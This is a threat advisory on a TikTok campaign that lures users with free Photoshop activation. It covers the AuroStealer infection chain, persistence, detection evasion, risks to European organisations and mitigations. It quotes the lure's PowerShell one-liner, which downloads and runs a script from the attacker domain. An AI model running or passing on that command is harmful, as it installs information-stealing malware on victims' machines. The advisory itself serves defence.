This threat involves a social engineering campaign leveraging TikTok videos that promote malware installation by enticing victims with offers such as free activation of Photoshop. The attacker posts videos containing instructions to run a PowerShell one-liner command with administrator privileges: iex (irm slmgr.win/photoshop). This command downloads and executes a malicious PowerShell script (SHA256: 6D897B56...) which subsequently downloads a second-stage payload, updater.exe (SHA256: 58b11b4dc8...), identified as AuroStealer, a known information-stealing malware. Persistence is achieved by registering scheduled tasks with names mimicking legitimate update tasks (e.g., MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore) that execute the malicious PowerShell script at user logon with highest privileges. A third payload, source.exe (SHA256: db57e4a73d3...), is downloaded and executed; it dynamically compiles code on the victim's machine using the .NET compiler (csc.exe) to inject shellcode directly into memory, a technique designed to evade traditional file-based detection. This multi-stage infection chain relies heavily on social engineering via TikTok videos, exploiting user trust in popular software and social media platforms. The campaign is reminiscent of the ClickFix attack scenario, emphasizing the risk of executing untrusted scripts from social media sources. Although no known exploits are in the wild beyond the social engineering vector, the malware's capabilities include persistence, data theft, and stealthy code injection. The campaign is currently rated as low severity but has potential for escalation if combined with further exploitation or lateral movement techniques.

For European organizations, this threat poses a risk primarily through user-targeted social engineering attacks that can lead to credential theft, data exfiltration, and potential footholds for further network compromise. The use of scheduled tasks for persistence and in-memory shellcode injection complicates detection and removal, increasing the risk of prolonged undetected presence. Organizations with employees who use social media platforms like TikTok, especially younger or less security-aware users, are at higher risk. The malware's ability to steal information (via AuroStealer) can lead to confidentiality breaches affecting sensitive corporate or personal data. Additionally, the dynamic compilation and execution of code on endpoints may bypass traditional antivirus solutions, increasing the likelihood of successful infection. While the initial infection requires user interaction, the widespread popularity of TikTok and the lure of free software activation could lead to significant infection rates. This can disrupt business operations, damage reputation, and incur regulatory penalties under GDPR if personal data is compromised.

1. Conduct targeted user awareness training focusing on the risks of executing commands or scripts from untrusted social media sources, emphasizing skepticism towards offers of free software activation. 2. Implement application control policies (e.g., Windows AppLocker or Microsoft Defender Application Control) to restrict execution of unauthorized PowerShell scripts and block the use of csc.exe for unapproved compilation tasks. 3. Monitor and audit scheduled tasks for suspicious names or creation patterns, especially those mimicking legitimate update tasks but created recently or by non-administrative users. 4. Deploy endpoint detection and response (EDR) solutions capable of detecting in-memory code injection and anomalous PowerShell activity with execution policy bypass. 5. Restrict PowerShell execution policies to disallow scripts from untrusted sources and enable logging of all PowerShell commands for forensic analysis. 6. Use network filtering to block access to known malicious domains and URLs associated with the campaign (e.g., slmgr.win, file-epq.pages.dev). 7. Regularly update and patch endpoint security tools to detect emerging malware variants like AuroStealer. 8. Encourage reporting and rapid incident response to suspected infections to contain lateral movement and data exfiltration.